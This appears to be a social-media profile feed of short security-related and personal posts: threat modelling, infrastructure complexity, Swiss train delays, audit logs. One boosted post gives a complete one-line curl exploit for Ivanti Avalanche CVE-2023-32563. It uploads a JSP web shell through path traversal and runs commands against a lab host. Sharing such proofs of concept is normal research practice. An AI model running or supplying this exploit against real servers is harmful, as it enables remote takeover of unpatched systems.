@starbuck3000

31 Followers
40 Following
70 Posts
T'as lu les conditions générales?
#cyber #cybersecurity #privacy
Twitterhttps://www.twitter.com/starbuck3000
starbuck3000Mar 16, 2025
Claus Cramon HoumannMar 10, 2025

So @trailofbits released a new threat modelling framework. I really like that, as all of the old existing 'reference' frameworks are so hard to apply in a way that brings any or much value to the process. Or I'm too dumb to do it :P.

Very exciting: https://blog.trailofbits.com/2025/02/28/threat-modeling-the-trail-of-bits-way/

#threatmodelling

Threat modeling the TRAIL of Bits way

In this blog, we’ll talk about our threat modeling process, TRAIL, which stands for Threat and Risk Analysis Informed Lifecycle. TRAIL enables us to trace and document the impact of flawed trust assumptions and insecure design decisions throughout each client’s system architecture and SDLC. Over time, multiple application security experts have refined TRAIL to provide maximal value for our clients and to minimize the effort required to update the threat model as the system changes.

The Trail of Bits Blog
Show threadstarbuck3000May 30, 2024
@plexus : interesting comparison. If I may: would you modify your analogy if we separate the addition of "stages" inside the code (e.g., adding a feature that brings great additional complexity into an existing monolithic artefact) vs. adding "stages" outside the code itself, which greatly complexifies the system's architecture/infrastructure cost of operation (e.g., moving to a K8S/Kafka infra.)?
Show threadstarbuck3000Oct 4, 2023

@limp15000 : Oh yes, I can second this. Things were running somehow smoothly for a few months until three-four weeks ago. Since, CFF has issues almost (if not always) each time I took the train from/to Geneva. Delays, breakdowns, two "accidents", misinformation, carriage breakdowns, broken seats, broken ACs, broken doors, broken toilets, broken ticket shop, etc.

The thing I am still actually thankful is that, for the moment, CFF always bring me from A to B. That's a big win.

starbuck3000Oct 4, 2023
- Describe your Twitter experience this month.
- Something went wrong. Try again.
starbuck3000Aug 25, 2023
wvuAug 25, 2023

Ivanti Avalanche CVE-2023-32563:

curl -v http://192.168.56.101:1900/Servlet/Skins -F guid=../../../Web/webapps/ROOT -F "file=@-;filename=x.jsp" <<<'<%Runtime.getRuntime().exec(request.getParameter("c"));%>' -: -k https://192.168.56.101:8443/x.jsp -d c=mspaint.exe

starbuck3000Aug 23, 2023
@GossiTheDog : good case of the old "with the cloud, no need to deal with backups anymore".
starbuck3000Jul 22, 2023
@GossiTheDog : got it, thank you!
Show threadstarbuck3000Jul 21, 2023
@GossiTheDog : I noticed that powershell tends to return up to 1'000 events but I hadn't heard about this limitation. Do you have more information about this? If this is true, the "audit log" should never be called as such.
Show threadstarbuck3000Jun 17, 2023
@sarambsimon : I came here through HN, and I had never heard of that article. thank you for sharing!
Show threadstarbuck3000Jun 2, 2023
@kurtsh : that roughly translates to USD33m... wow!
Good thing your work prevented you from doing this huge "mistake" :)